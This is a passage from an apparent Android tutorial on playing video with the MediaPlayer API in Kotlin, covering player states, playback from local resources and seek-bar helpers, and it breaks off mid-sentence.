Chain of responsibility design pattern is one of the behavioral design pattern. Table of Contents - 1 Chain of Responsibility Design Pattern - 1.1 Chain of Responsibility Pattern Example in JDK - 1.2 Chain of Responsibility Design Pattern Example - 1.3 Chain of Responsibility Design Pattern – Base Classes and Interface - 1.4 Chain of Responsibilities Pattern – Chain Implementations - 1.5 Chain of Responsibilities Design Pattern – Creating the Chain - 1.6 Chain of Responsibilities Design Pattern Class Diagram - 1.7 Chain of Responsibility Design Pattern Important Points - 1.8 Chain of Responsibility Pattern Examples in JDK Chain of Responsibility Design Pattern Chain of responsibility pattern is used to achieve loose coupling in software design where a request from client is passed to a chain of objects to process them. Then the object in the chain will decide themselves who will be processing the request and whether the request is required to be sent to the next object in the chain or not. Chain of Responsibility Pattern Example in JDK Let’s see the example of chain of responsibility pattern in JDK and then we will proceed to implement a real life example of this pattern. We know that we can have multiple catch blocks in a try-catch block code. Here every catch block is kind of a processor to process that particular exception. So when any exception occurs in the try block, its send to the first catch block to process. If the catch block is not able to process it, it forwards the request to next object in chain i.e next catch block. If even the last catch block is not able to process it, the exception is thrown outside of the chain to the calling program. Chain of Responsibility Design Pattern Example One of the great example of Chain of Responsibility pattern is ATM Dispense machine. The user enters the amount to be dispensed and the machine dispense amount in terms of defined currency bills such as 50$, 20$, 10$ etc. If the user enters an amount that is not multiples of 10, it throws error. We will use Chain of Responsibility pattern to implement this solution. The chain will process the request in the same order as below image. Note that we can implement this solution easily in a single program itself but then the complexity will increase and the solution will be tightly coupled. So we will create a chain of dispense systems to dispense bills of 50$, 20$ and 10$. Chain of Responsibility Design Pattern – Base Classes and Interface We can create a class Currency that will store the amount to dispense and used by the chain implementations. Currency.java package com.journaldev.design.chainofresponsibility; public class Currency { private int amount; public Currency(int amt){ this.amount=amt; } public int getAmount(){ return this.amount; } } The base interface should have a method to define the next processor in the chain and the method that will process the request. Our ATM Dispense interface will look like below. DispenseChain.java package com.journaldev.design.chainofresponsibility; public interface DispenseChain { void setNextChain(DispenseChain nextChain); void dispense(Currency cur); } Chain of Responsibilities Pattern – Chain Implementations We need to create different processor classes that will implement the DispenseChain interface and provide implementation of dispense methods. Since we are developing our system to work with three types of currency bills – 50$, 20$ and 10$, we will create three concrete implementations. Dollar50Dispenser.java package com.journaldev.design.chainofresponsibility; public class Dollar50Dispenser implements DispenseChain { private DispenseChain chain; @Override public void setNextChain(DispenseChain nextChain) { this.chain=nextChain; } @Override public void dispense(Currency cur) { if(cur.getAmount() >= 50){ int num = cur.getAmount()/50; int remainder = cur.getAmount() % 50; System.out.println("Dispensing "+num+" 50$ note"); if(remainder !=0) this.chain.dispense(new Currency(remainder)); }else{ this.chain.dispense(cur); } } } Dollar20Dispenser.java package com.journaldev.design.chainofresponsibility; public class Dollar20Dispenser implements DispenseChain{ private DispenseChain chain; @Override public void setNextChain(DispenseChain nextChain) { this.chain=nextChain; } @Override public void dispense(Currency cur) { if(cur.getAmount() >= 20){ int num = cur.getAmount()/20; int remainder = cur.getAmount() % 20; System.out.println("Dispensing "+num+" 20$ note"); if(remainder !=0) this.chain.dispense(new Currency(remainder)); }else{ this.chain.dispense(cur); } } } Dollar10Dispenser.java package com.journaldev.design.chainofresponsibility; public class Dollar10Dispenser implements DispenseChain { private DispenseChain chain; @Override public void setNextChain(DispenseChain nextChain) { this.chain=nextChain; } @Override public void dispense(Currency cur) { if(cur.getAmount() >= 10){ int num = cur.getAmount()/10; int remainder = cur.getAmount() % 10; System.out.println("Dispensing "+num+" 10$ note"); if(remainder !=0) this.chain.dispense(new Currency(remainder)); }else{ this.chain.dispense(cur); } } } The important point to note here is the implementation of dispense method. You will notice that every implementation is trying to process the request and based on the amount, it might process some or full part of it. If one of the chain not able to process it fully, it sends the request to the next processor in chain to process the remaining request. If the processor is not able to process anything, it just forwards the same request to the next chain. Chain of Responsibilities Design Pattern – Creating the Chain This is a very important step and we should create the chain carefully, otherwise a processor might not be getting any request at all. For example, in our implementation if we keep the first processor chain as Dollar10Dispenser and then Dollar20Dispenser, then the request will never be forwarded to the second processor and the chain will become useless. Here is our ATM Dispenser implementation to process the user requested amount. ATMDispenseChain.java package com.journaldev.design.chainofresponsibility; import java.util.Scanner; public class ATMDispenseChain { private DispenseChain c1; public ATMDispenseChain() { // initialize the chain this.c1 = new Dollar50Dispenser(); DispenseChain c2 = new Dollar20Dispenser(); DispenseChain c3 = new Dollar10Dispenser(); // set the chain of responsibility c1.setNextChain(c2); c2.setNextChain(c3); } public static void main(String[] args) { ATMDispenseChain atmDispenser = new ATMDispenseChain(); while (true) { int amount = 0; System.out.println("Enter amount to dispense"); Scanner input = new Scanner(System.in); amount = input.nextInt(); if (amount % 10 != 0) { System.out.println("Amount should be in multiple of 10s."); return; } // process the request atmDispenser.c1.dispense(new Currency(amount)); } } } When we run above application, we get output like below. Enter amount to dispense 530 Dispensing 10 50$ note Dispensing 1 20$ note Dispensing 1 10$ note Enter amount to dispense 100 Dispensing 2 50$ note Enter amount to dispense 120 Dispensing 2 50$ note Dispensing 1 20$ note Enter amount to dispense 15 Amount should be in multiple of 10s. Chain of Responsibilities Design Pattern Class Diagram Our ATM dispense example of chain of responsibility design pattern implementation looks like below image. Chain of Responsibility Design Pattern Important Points - Client doesn’t know which part of the chain will be processing the request and it will send the request to the first object in the chain. For example, in our program ATMDispenseChain is unaware of who is processing the request to dispense the entered amount. - Each object in the chain will have it’s own implementation to process the request, either full or partial or to send it to the next object in the chain. - Every object in the chain should have reference to the next object in chain to forward the request to, its achieved by java composition. - Creating the chain carefully is very important otherwise there might be a case that the request will never be forwarded to a particular processor or there are no objects in the chain who are able to handle the request. In my implementation, I have added the check for the user entered amount to make sure it gets processed fully by all the processors but we might not check it and throw exception if the request reaches the last object and there are no further objects in the chain to forward the request to. This is a design decision. - Chain of Responsibility design pattern is good to achieve lose coupling but it comes with the trade-off of having a lot of implementation classes and maintenance problems if most of the code is common in all the implementations. Chain of Responsibility Pattern Examples in JDK - java.util.logging.Logger#log() - javax.servlet.Filter#doFilter() Thats all for the Chain of Responsibility design pattern, I hope you liked it and its able to clear your understanding on this design pattern. Trying to understand help and assistance is needed. Thank you Hi Pankaj, great tutorials. Keep going please, with your tutorials because are very useful and educational. I have a question however, here it is. How this would work the same but just for 20 and 50 only Monetaries ? any hint? Thank you after printing the “Amount should be in multiple of 10s.” you could apply continue instead of return. So that the program execution will continue, just a minor suggestion. but nice explanation Great post, my only suggestion is to avoid repeat code like in the dispense method, all logic could be in the base class. Great explation! Bro, It helps me to understand the chain of responsibility pattern,Thanks Hello Pankaj Firstly i would like to thank you for this Wonderful article. Just a finding from my end, which i would like to share. Please correct me if i am wrong. I think the else part in all the dispense method is not required. It gives a wrong output. Say for example; see the following steps 1. Say if i entered 60, it will enter the Dollar50 dispense method and it will print (1 note being dispensed – 50 dollar). 2. as the remainder is !=0, it will go to next dispenser in the chain. 3. Say if i entered 50, it will enter Dollar50 dispense method and it will print ( 1 note being dispensed – 5o dollar) 4. as the remainder is 0, it will enter the else part and it will print again the above content (as shown in point 3). I did test in my machine and removed the else part, and it works correctly for any number. Regards Dolly Can you please specify the code snippet you removed? The code is working fine. If you enter the amount as 50 then the output will be: Enter amount to dispense 50 Dispensing 1 50$ note Enter amount to dispense Nice example but!!! I don´t undert why in main method do you have a while(true). No particular reason. It’s just so you can try as many examples as you want without having to restart the program every time It’s not necessary for the design pattern. Reading information but im truly a beginner need more knowledge and skills to help me get started here!! Great explanations and sample! Thank you bro. Great blog and perfect explanation with exampl. Thanks public class Dollar10Dispenser implements DispenseChain this.chain.dispense(cur); nullPointException occur The Composition say [0…1] so for Dollar10Dispenser next DispenseChain is not required. you can remove that to avoid Null exception. Nice example and well explained. In the Dispence method of Dollar50Dispenser, Dollar20Dispenser and Dollar10Dispenser, else part is not required i guess. Request is already getting processed to the next chain dispense if remainder != 0 . Correct me if i am wrong. And I didnt get the use of always true while loop in the main method. Not required i guess. Awesome article for this concept. thank you for your articles. Will this program ever return two 50$ (or 20$ or 10$ ) notes. If yes , then can anybody explain how ? Yes it will..The first condition is for (50$) if(cur.getAmount() >= 50){ int num = cur.getAmount()/50; int remainder = cur.getAmount() % 50; System.out.println(“Dispensing “+num+” 50$ note”); consider cur.getAmount() is 156, so num will be 3 notes of $50 Thanks a lot mahn!! Gave me a clear cut view about filter chain! Keep up the good work! Nice article. Why don’t you check if the next chain is set before to call his method dispense()? Your example doesn’t throw a null pointer exception just because you assert that the entered value is a multiple of 10. But this is an information that the 10DollarDispenser doesn’t know. Great example… You Rock always, Pankaj..! You gave a crisp and Clear Explanation I liked the Explanation.It was very crisp and clear Good Example and quiet easy to understand the design pattern Thanks Karthik for nice words. nice and clear example. Thanks Easy to understand. Thank you Thank you very much Pankaj. The tutorial on Design Patterns was very helpful. I could get a brief overview of Design Patterns and one more good point is that you have taken real world examples to demonstrate. In some part of the tutorial you have mentioned that one design pattern can be combined with the other to make it more efficient, it would be helpful if you post some samples on it. Great work buddy. Thanks a lot. Yes this is very easy to follow and with real world examples. Thanks for sharing. Examples are great trying to understand where would codes be put in at Mate, once again, check your English! It’s loose coupling. Furthermore, Gaurav, you’re right about only one object handling the request. That would be what’s called a pure implementation. On the other hand, there’s no real problem to let the request go through the entire tree. Another point, which is not discussed in this article, is that you may set or change the next handler during runtime. You also may not know beforehand which are the handlers that should be used, allowing the client to set them as desired. As an example, you could have many Validator classes which can be called in a certain order. But that depends on the validation. So you apply CoR and make good use out of the possibility of combining different validators ordered in so many different ways. Suppose you want to validate an email address. You need to check if the e-mail is correctly formed, if it exists, and if contains bad words. To do this job, you may have three different classes, and you can arrange them in any order – so you might as well let the client decide its own priority. After implementing this design pattern for years, i commonly see that there is repeated code in the concrete classes just like the implementation of your dispense methods. The intent of this design pattern is nice, but dont forget the DRY principle and it is a must in my humble opinion. I always use abstract classes for cor design pattern to eliminate duplicate code. Good example. I’d like to point out one thing though. The pattern per GoF definition says that ‘Only one object in the chain is supposed to handle a request’. In your example I see handlers($50 and $20) doing the work partially and letting $10 handler do the rest of the job. I think I may be wrong coz GoF also says that – Use CoR when more than one object may handle the request… Hi.. Nice tutorial.. Just 1 suggestion setNextChain() would have been moved to DispenseChain abstract class instead of keeping DispenseChain as abstract class and overriding setNextChain() in all the concrete classes.. By having setNextChain() as abstract method, we are forcing subclasses classes to provide implementation for that. For example purpose implementation is simple but there might be cases where some logic is involved for this. Yes if it’s simple as this, we can move it to abstract class. It’s a design decision and should be based on project requirements. Getting the below exception … Exception in thread “main” java.lang.NullPointerException at com.chain.responsibility.dispenser.HundredDollarDispenser.dispense(HundredDollarDispenser.java:26) at com.chain.responsibility.dispenser.FiftyDollarDispenser.dispense(FiftyDollarDispenser.java:30) at com.chain.responsibility.dispenser.ATMDispenseChain.main(ATMDispenseChain.java:33) Problem is we don’t have setNextPattern for the last level Hi, Can you provide the download link for this example. There is no download link, its simple java classes. You can copy paste the code and run it. I savor, cause I discovered exactly what I was having a look for. You’ve ended my 4 day long hunt! God Bless you man. Have a great day. Bye
https://www.journaldev.com/1617/chain-of-responsibility-design-pattern-in-java
CC-MAIN-2021-10
refinedweb
2,713
58.18
19 October 2012 19:41 [Source: ICIS news] By Larry Terry HOUSTON (ICIS)--Two ?xml:namespace> November price-increase efforts of 6-8 cents/lb ($132-176/tonne, €102-136/tonne) have been more difficult than usual for buyers to tolerate, given prevailing soft acrylates market conditions. The proposed 8-cent/lb increases cover Arkema's 2-ethylhexyl acrylate (2-EHA) and methyl acrylate (methyl-A). Current Most buyers do not seem to argue with the idea of sellers recouping input costs, but primary feedstock chemical-grade propylene (CGP) has moved negligibly during the past several months. Although CGP fell sharply in May and June, it has been all but stable in recent months, settling flat for July, falling by 1.50 cents/lb for August and rising by just 1.00 cent/lb for September. Only two producers, Dow Chemical and Arkema, have announced plans to boost acrylates prices, effective on 1 November, or as contracts allow. And only one of those sellers has offered a reason for its increase initiative. “Raw material prices, specifically propylene, have increased and are projected to be volatile over the upcoming months,” Dow said in a 15 October price letter to customers announcing its planned 7 cent/lb hikes. The rationale of “expected volatility in raw material prices” has been derided by some buyers, with one calling it ridiculous. Buyers are adamant that November price-hike efforts should fail and they are hopeful they will fail, especially given the absence of acrylates initiatives from BASF. All of the producers have been reticent, but most buyers said BASF is not expected to pursue November price increases. Two buyers suggested producers are responding to - or taking advantage of - supply concerns stemming from the acrylic acid unit explosion at Nippon Shokubai’s complex in Himeji, Japan, at the end of September. The site’s acrylic acid plant, which has a nameplate production capacity of 380,000 tonnes/year, was one of several operations taken down at the site. The duration of shutdowns there is not known, but no Further, any acrylates price gains would be predicated solely on propylene, a buyer said. “I don't see any of the price initiatives being implemented with contract customers,” a buyer said. “Propylene only moved up by 1.50 cents/lb in October, and I am expecting my contract suppliers to move up by only 80-90% of
http://www.icis.com/Articles/2012/10/19/9605736/Proposed-US-acrylates-hikes-fight-against-stable-feedstock.html
CC-MAIN-2015-11
refinedweb
399
51.78
Subject: Re: [OMPI users] Problems Using PVFS2 with OpenMPI From: Edgar Gabriel (gabriel_at_[hidden]) Date: 2010-01-13 12:55:51 I don't know whether its relevant for this problem or not, but a couple of weeks ago we also found that we had to apply the following patch to to compile ROMIO with OpenMPI over pvfs2. There is an additional header pvfs2-compat.h included in the ROMIO version of MPICH, but is somehow missing in the OpenMPI version.... ompi/mca/io/romio/romio/adio/ad_pvfs2/ad_pvfs2.h --- a/ompi/mca/io/romio/romio/adio/ad_pvfs2/ad_pvfs2.h Thu Sep 03 11:55:51 2009 -0500 +++ b/ompi/mca/io/romio/romio/adio/ad_pvfs2/ad_pvfs2.h Mon Sep 21 10:16:27 2009 -0500 @@ -11,6 +11,10 @@ #include "adio.h" #ifdef HAVE_PVFS2_H #include "pvfs2.h" +#endif + +#ifdef PVFS2_VERSION_MAJOR +#include "pvfs2-compat.h" #endif Thanks Edgar Rob Latham wrote: > On Tue, Jan 12, 2010 at 02:15:54PM -0800, Evan Smyth wrote: >> OpenMPI 1.4 (had same issue with 1.3.3) is configured with >> ./configure --prefix=/work/rd/evan/archives/openmpi/openmpi/1.4/enable_pvfs \ >> --enable-mpi-threads -- >> PVFS 2.8.1 is configured to install in the default location (/usr/local) with >> ./configure --with-mpi=/work/rd/evan/archives/openmpi/openmpi/1.4/enable_pvfs > > In addition to Jeff's request for the build logs, do you have > 'pvfs2-config' in your path? > >>. > > That's a good piece of information. I run in that configuration > often, so we should be able to make this work. > >>. > > PVFS needs an MPI library only to build MPI-based testcases. The > servers, client libraries, and utilities do not use MPI. > >>). > > In this case, since you do not have the PVFS file system mounted, the > 'pvfs2:' prefix is mandatory. Otherwise, the MPI-IO library will try > to look for a directory that does not exist. > >>. > > It sounds like you're on the right track. I should update the PVFS > quickstart for the OpenMPI specifics. In addition to pvfs2-ping and > pvfs2-ls, make sure you can pvfs2-cp files to and from your volume. > If those 3 utilities work, then your OpenMPI installation should work > as well. > > ==rob > --
http://www.open-mpi.org/community/lists/users/2010/01/11753.php
CC-MAIN-2014-42
refinedweb
366
58.99
Im using a C## script and Im wondering how to play sound when I press the H key.. it wont work and Im using a .wav sound file, nothing big. I cant get anything to play.. [RequireComponent(typeof(AudioSource))] public class PlayerHealth : MonoBehaviour { public AudioClip PlayerHit; // Update is called once per frame void Update () { if (Input.GetKeyDown (KeyCode.H)) { audio.PlayOneShot(PlayerHit); } do you get any runtime errors with this or is there just no sound playing? Add a debug line to see if the PlayOneShot method gets called. Maybe your clip is marked as a 3D sound (default setting) and your listener is too far away. No errors at all Answer by khan-amil · Jan 21, 2014 at 01:31 PM Assuming that's all, your code is good and should work. Be sure to check taht your sound is either 2D or that your source is close to your Listener (default is on the main camera) Answer by Drakulo · Jan 21, 2014 at 01:29 PM If your sound is defined as "3D", playing it will considerate audio listener position in 3D space and apply volume changes. Have you tried to use 2D sound ? You can change it in the inspector when selecting your sound in the project. Random, 3d sound. 1 Answer How do I play audio source on Maximize on Play / Audio Source wont play on Maximize 0 Answers Play Audio Sound OnTriggerEnter 2 Answers Play next song 1 Answer Help with sound clips [C#] 0 Answers
https://answers.unity.com/questions/621904/playing-sound.html
CC-MAIN-2020-34
refinedweb
251
70.94
Hi! Having some major issues my homework assignment. I have to end this while loop when detecting two consecutive newline escape sequences in a row. This is the word problem: Write a program that gives and takes advice on program writing. The program starts by writing a piece of advice to the screen and asking the user to type in occurrences of the character ‘\n’. Any help would be greatly appreciated. #include <iostream> #include <fstream> using namespace std; ifstream reader; ofstream writer; void readerOpen() { reader.open("hw4pr5input.txt"); if (reader.fail()) { cout<<"\nThere was an error opening the file.\n"; exit(1); } } void writerOpen() { writer.open("hw4pr5input.txt"); if (writer.fail()) { cout<<"\nThere was an error opening the file.\n"; exit(1); } } ////////////////////////////////////////////////////////////////////////// int main( ) { char data; char tmp; bool escapePrevious=false; cout<<"\nSolution to Homework Assignment 4 Problem 5\n"; readerOpen(); cout<<"\nAdvice of previous user: "<<endl; while(!reader.eof()) { reader.get(data); cout.put(data); } reader.close(); writerOpen(); data = ' '; cout<<"\nPlease enter your advice. End by hitting Enter twice:\n\n"; ////////////////////////////////////////////////////////////////////////////// while(!writer.eof() && escapePrevious != true && tmp != '\n') { cin.get(data); writer.put(data); if (data == '\n') { if(escapePrevious==true) { tmp = '\n'; } else { escapePrevious=true; } } } /* the way i see it, if i press the return key, the conditional with the if(data == '\n') will skip the first conditional statement and assign escapePrevious true, and then if the condition is tested a second time and escapePrevious is already true, tmp will be assigned the newline character, thus negating the condition in my while loop. Im doing something terribly wrong here because it is exiting the loop the first time i press return*/ writer.close(); cout<<"\nThanks for the advice."<<endl; system("Pause"); return 0; }
https://www.daniweb.com/programming/software-development/threads/312345/c-homework
CC-MAIN-2021-25
refinedweb
284
57.87
On Dynamic Objects and DynamicObject As you know if you read my blog, C# 4.0 introduced some language features that help you consume dynamic objects. Although it’s not part of the language, most of the writing about dynamic in C# that I have seen, including my own, also contains some point about how you create dynamic objects. And they usually make it clear that the easiest way to do that is to extend System.Dynamic.DynamicObject. For instance, you might see an example such as the following, which is pretty straight-forward: using System; using System.Dynamic; class MyDynamicObject : DynamicObject { public override bool TryInvokeMember(InvokeMemberBinder binder, object[] args, out object result) { Console.WriteLine("You called method {0}!", binder.Name); Console.WriteLine("... and passed {0} args.", args.Length); result = null; return true; } } class Program { static void Main(string[] args) { dynamic d = new MyDynamicObject(); d.Foo(d, 1, "bar"); } } ... that prints: You called method Foo! ... and passed 3 args. That’s all well and good. But I want to tell you that although this works and is easy, DynamicObject is not a type that is specially known to the DLR, and that this is not the primary mechanism to define dynamic objects. The primary mechanism is to implement the interface IDynamicMetaObjectProvider, and to provide your own specialization of DynamicMetaObject. These two types are specially known to the DLR and they are the mechanism by which dynamic (including DynamicObject) really works. DynamicObject is a tool of convenience. You could write it yourself, if you wanted to. The design of DynamicObject deliberately introduces some trade-offs in the name of ease-of-use, and if your code or library is not OK with those trade-offs, then you should consider your alternatives. Binding vs. executing One thing that DynamicObject does to your dynamic objects is that it confuses two separate “phases” of the execution of a dynamic operation. There is a lot of machinery in the DLR that is designed to make your dynamic operations fast, and there are concepts called “call sites” and “rules” and “binders,” etc., and you can dig into this yourself if it’s important, but the upshot is: when a dynamic operation is bound at runtime, the binding is cached using something called a “rule” that indicates the circumstances under which to execute some code, as well as the code to execute. Subsequent to the binding, the code the binding produced is simply run when needed. If you implement your dynamic object using DynamicObject, these things still happen. However, they ignore the code that you put in your DynamicObject and execute it every time through a true dynamic operation. Let me give you an example to make this a little clearer. Suppose you wanted to write a dynamic type that queried some external data somewhere. With DynamicObject, you might do something like the following: class MyDynamicData : DynamicObject { public override bool TryGetMember(GetMemberBinder binder, out object result) { string propName = binder.Name; if (this.externalData.HasColumn(propName)) { result = this.externalData.GetData(this.currentRow, propName); return true; } else { return base.TryGetMember(binder, out result); } } // ... } In this code, we're trying to get a property value. So we go to the external data to see if the property name makes sense, and then we retrieve the relevant data to return to the user. Remember I said that dynamic bindings use “rules?” If the user types “d.FooBaz”, where d holds one of these MyDynamicData objects, then “rule” that is generated is as follows. First, the test part is this: ($arg0 TypeEqual MyDynamicData) And the execution part is this: .Block(System.Object $var1) { .If ( .Call ((System.Dynamic.DynamicObject)$$arg0).TryGetMember( .Constant<System.Dynamic.GetMemberBinder>(Microsoft.CSharp.RuntimeBinder.CSharpGetMemberBinder), $var1) ) { $var1 } .Else { .Throw .New Microsoft.CSharp.RuntimeBinder.RuntimeBinderException("'MyDynamicData' does not contain a definition for 'FooBaz'") } } If that syntax doesn’t make much sense to you, let me explain. The DLR encodes these things using LINQ expression trees, and the strings above are simply a debug view of those things. They’re not complicated. Basically, the rule says that if the actual runtime type of the object is a MyDynamicData, then what the DLR should execute is the code below, which calls your TryGetMember, and if that returns true then return your result. Otherwise, it should throw an exception that says there is no property FooBaz. That exception, incidentally, came from the C# binder. The whole dance that goes on to determine what the rule is is a little bit complicated, but the important part is that the TryGetMember you defined in your MyDynamicData is not a part of it. Instead, every single time that user’s line of code that contains “d.FooBaz” runs, your TryGetMember is run. Every time. You could imagine an alternative, where instead, of TryGetMember running every time, you write some code that looks at the name of the property and makes a determination about what it should do, and then the rule contains code that simply does that thing. In our case, the rule would just have to run the “this.externalData.GetData(this.currentRow, propName)” part. Or just throw if the property name was bogus. Either way, you’re doing less every time through. Of course, this alternative exists, and it requires you not to use DynamicObject. If you implemented your own IDynamicMetaObjectProvider, you could slim up your rules as much as possible by doing your analysis once, not on every execution. Object is king--except DynamicObject There is another snag in DynamicObject that is in place in the interest of speed and ease-of-use, and it is the following: when the call site’s underlying language provides some binding for any operation, that binding overrules any dynamic bindings that might exist. This is in contrast to the ordinary behavior in the DLR, which is that the object gets to pick what it wants to do first. That strategy is sometimes summarized by the DLR’s designers as “object is king.” And, well, DynamicObject in some sense adheres to this principle, except that what it decides to do is defer to the language whenever it can. This has some interesting consequences in C#. Check out the following program. using System; using System.Collections; using System.Dynamic; class MyDynamicObject : DynamicObject { public override bool TryBinaryOperation(BinaryOperationBinder binder, object arg, out object result) { Console.WriteLine("TryBinaryOperation for {0}", binder.Operation); result = "dynamically returned result"; return true; } public override bool TryConvert(ConvertBinder binder, out object result) { Console.WriteLine("TryConvert for {0}", binder.Type.Name); result = new string[] { "dynamically", "returned", "result" }; return true; } } class QuestionableProgram { static void Main(string[] args) { dynamic d = new MyDynamicObject(); Console.WriteLine(d == null); Console.WriteLine((IEnumerable)d); } } What does this do? You might like to think that it prints the strings in the DynamicObject method overrides. But it does not. It prints “False” and then throws. Why? Because when the DynamicObject was asked to bind itself, it first asked the C# binder to bind the operations. In the first case, “d == null”, the C# binder said “yes! I can bind this! here you go!” and returned a normal object identity comparison. In the second case, the C# binder said “yes! I can bind this! here you go!” and returned a normal interface reference coercion. For that last one, recall that there is always an explicit conversion from most class types to any interface type in C# (6.2.4, bullet 3), though they can fail. And fail this one does, since MyDynamicObject does not statically implement IEnumerable. Just to expand on the interface conversion example a bit, it’s especially weird since if the conversion were implicit (say, try assigning to a local), then the dynamic conversion would have worked. Why? Because the C# binder would have said, “nope! no implicit conversion to IEnumerable,” and then the DynamicObject implementation would have let TryConvert do its thing. And these are just some of the examples. This behavior means that you cannot dynamically do lots of things, include define a ToString or Equals method, or even hide such members as TryInvokeMember. In other words, if I have a DynamicObject in hand and concealed behind the dynamic type, all of the overrideable members are always directly (though dynamically) invocable. Ugh. Again, if this behavior does not suit you, then you need to roll your own. But there’s a reason I don’t mean to disparage DynamicObject. It really is a convenient and easy-to-use type, and if you’re not exposing dynamic objects in a library then it may be perfectly suitable to use. The design decisions that led us here are deliberate. First, for the intermingling of binding and execution code, well, that whole protocol is very confusing. DynamicObject presents a much more easy to understand model. It doesn’t even require you to understand LINQ expression trees. But it gives up performance. Then, binding statically when possible gets a lot of that performance back. To give an example, although you cannot directly dynamically expose all the things I mentioned in the last bit (==, interface conversions, etc), you can just as easily introduce them statically and they’ll get called with no further help from you, and more quickly too. ExpandoObject, by the way, is the other convenience type for users of static languages such as C# to create dynamic objects. You can read about both of these types, if you are interested, in the DLR’s excellent documentation at. Just remember that when someone says that “DynamicObject is the way to generate dynamic types in C#,” what they should really have said is that DynamicObject is a way to generate dynamic types in C#. Other ways include directly with IDynamicMetaObjectProvider, or by stepping outside of C# and defining some types in Python or Ruby or any other DLR language. I intended to present some of these alternatives in the future.
https://docs.microsoft.com/en-us/archive/blogs/cburrows/on-dynamic-objects-and-dynamicobject
CC-MAIN-2020-24
refinedweb
1,646
56.55
MediaPlayer: Simplified Video Playback on Android Playing videos is a common requirement in Android apps. In this tutorial learn about handling video playback via the MediaPlayer API on Android. Version - Kotlin 1.4, Android 4.4, Android Studio 4.0 Playing audio or video in Android apps is a common requirement for many projects. Many apps in the Google Play Store, even some non-streaming ones, provide audio and video playback. Above all, it’s an important topic that will lead you to many job opportunities. In this tutorial, you’ll build an Android app that plays video from various sources, such as videos locally stored in your phone, the res folder, gallery and a URL using MediaPlayer. Along the way you’ll learn about: - MediaPlayer. - The states of MediaPlayer. - Playing video from the res/raw folder. - Playing video from a URL. - Best practices for MediaPlayer. - Digital Right Management. Getting Started Download the materials using the Download Materials button at the top or the bottom of this page. Extract and open the starter project in Android Studio. Build and run. You’ll see something like this: The app isn’t interactive yet because the starter project only consists of UI and some basic code. You’ll implement the functionality throughout this tutorial. Understanding the code Before the hands-on part of this tutorial, take some time to understand the codebase you’ll build on. Navigate to these three files and check out their contents: - AndroidManifest.xml: At the top of the manifest file you’ll find android.permission.INTERNET. In this tutorial, you’ll play a video from a URL, so you’ll need the INTERNET permission. - activity_video.xml: This is the one and only layout file in the project. It consists of: - A VideoViewto play video. - A ProgressBarto shows the user it’s loading a video. - Two TextViewsand a SeekBarto show progress. - An ImageButtonto play and pause a video. - VideoActivity.kt: This might look a bit overwhelming, but if you skim through and read the comments, you’ll find it quite simple. The class implements a few interface classes to manage MediaPlayerand seekBarcallbacks. You’ll understand these implementations once you start working on the functionality. Also, to keep your app from falling asleep, you’ll need to keep your screen on. Notice this line inside onCreate()which adds a flag window.addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON). Setting this flag ensures your screen stays on, while the app is in use. You don’t want the user’s device to fall asleep and lock while they’re watching a video on your app, do you? MediaPlayer MediaPlayer is a part of the Android multimedia framework that plays audio or video from the resource directory and gallery. It also streams music or video from a URL. When a media file plays, the MediaPlayer API goes through several states, which are summarized in the diagram below: That’s a lot of information to take in, but before you can use the - Idle State: MediaPlayeris in an idle state when you first instantiate it, or first create it using the new keyword. You also reach this state after you call reset(). At this stage, you can’t play, pause or stop the media. If you try to force it, the app might crash. - End State: Calling MediaPlayer‘s release()method frees resources and moves it to the end state. At this stage, you can’t play or pause the media. - Error State: You reach this state if you try to play, pause or stop an uninstantiated MediaPlayerobject. However, you can catch the error using MediaPlayer’s onErrorListener.onError()callback. - Initialized State: MediaPlayerreaches this state when you set a data source. To set a one, use setDataSource()method. Be aware that you can only set a data source when MediaPlayeris in an idle state or it’ll throw an IllegalStateException. - Prepared State: Before you play any media from a file or a URL, you need to prepare your MediaPlayerby calling either prepare()or prepareAsync(). Once prepared, it reaches this state and calls onPreparedListener(). - Started State: Once MediaPlayeris ready, you can play the media by calling start(). While the music or video plays, MediaPlayeris in a started state. - Paused State: When you pause the media, MediaPlayeris in this state. To pause MediaPlayer, call pause(). - Stopped State: MediaPlayeris in this state when media stops playing. If MediaPlayeris in this state and you want to play the media again, you have to prepare it again by calling prepare()or prepareAsync(). - PlaybackCompleted State: When the playback is complete, MediaPlayeris in this state. Additionally, invokes onCompletion.onCompletion(). If MediaPlayeris in this state you can call the start()and play audio or video again. Okay, enough theory. It’s time to code! Playing Video From Local Resources You will start with playing a video file in the raw directory. There’s a video in the starter project named test_video.mp4. From the states you learned above, you may see that to play the video in your VideoView, you have to: - Set the data source using MediaPlayer - Call the start()function But you may be wondering where do you add this code? For this, a couple of options may come to your mind. The most common way to add new code into Android apps is to put it in the onCreate() method, because you know it will be the entry point of your activity. But in the case of Media Player that’s not good practice for two reasons: - First, you don’t know the size of the video or how much time MediaPlayerwill take to load it. - Second, MediaPlayercan play a video in VideoViewthrough its surface, which also takes time. Take a look at the code inside the onCreate() method of VideoActivity. In there you will see the following line: video_view.holder.addCallback(this), this gets a callback when the VideoView‘s surface is ready for playing video. When this surface is ready, it calls surfaceCreated(). Next, inside surfaceCreated() replace // TODO (1) with: mediaPlayer.apply { setDataSource(applicationContext, // 1 Uri.parse("android.resource://$packageName/raw/test_video")) // 2 setDisplay(surfaceHolder) // 3 prepareAsync() } In this code, you perform three tasks: - First, you pass the location, URI, of the video. - Then, you set MediaPlayer‘s display to the VideoView‘s surface by calling setDisplay(surfaceHolder).Note: If you started the MediaPlayerwithout calling this function, you wouldn’t see any video because MediaPlayerwouldn’t know where to display the video. - Finally, you call prepare(). This function prepares MediaPlayerto playback the video synchronously on the main thread. MediaPlayer is prepared When MediaPlayer is prepared, it invokes onPrepared(). This is the point where you will start playing the video. To do that, replace // TODO (2) inside onPrepared() with: // 1 progress_bar.visibility = View.GONE //2 mediaPlayer?.start() Here you: - Make the progressBarinvisible. - Tell MediaPlayerto start the video. Now Build and Run. Tada! Now you can play the video from your raw or resource directory, but still, something is missing. The seekBar isn’t updating, and you can’t pause or play the video. Next, you’ll implement the missing functionality and make the app more intuitive. Improving the UX Before you add the functionality to play, pause or fast-forward video using SeekBar, you need to create a few functions and extension properties. At the bottom of VideoActivity.kt replace // TODO (3) with: // 1 private val MediaPlayer.seconds: Int get() { return this.duration / SECOND } // 2 private val MediaPlayer.currentSeconds: Int get() { return this.currentPosition / SECOND } These extension properties help you implement those functionalities. MediaPlayer itself provides you with the video duration and currentPosition, therefore you don’t have to worry for tracking them. secondsreturns the total duration of the video in seconds. currentSecondsreturns the current 